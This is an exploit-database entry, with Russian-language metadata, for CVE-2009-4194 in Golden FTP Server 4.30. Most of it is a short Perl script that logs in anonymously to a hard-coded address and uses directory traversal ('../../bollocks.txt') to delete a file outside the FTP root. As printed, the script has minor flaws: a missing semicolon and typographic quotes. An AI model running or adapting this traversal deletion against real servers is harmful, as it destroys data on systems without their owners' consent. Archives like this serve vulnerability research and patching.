Exploit Golden FTP Server 4.30 - File Deletion

[Exploiter]

EDB-ID

10258

Проверка EDB

1. Пройдено

Автор

SHARPE

Тип уязвимости

REMOTE

Платформа

WINDOWS

CVE

cve-2009-4194

Дата публикации

2009-12-01

# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Software Link: [http://www.goldenftpserver.com/download.html]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
# Code : [http://blog.sat0ri.com/?p=292]

#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/

use strict;
use Net::FTP

my $ftp = Net::FTP->new(”192.168.1.35″, Debug => 1) || die $@;

$ftp->login(”anonymous”, ‘[email protected]’) || die $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(”/public/”) || die $ftp->message;

# This deletes the file C:\bollocks.txt
$ftp->delete(”../../bollocks.txt”);

$ftp->quit;

$ftp = undef;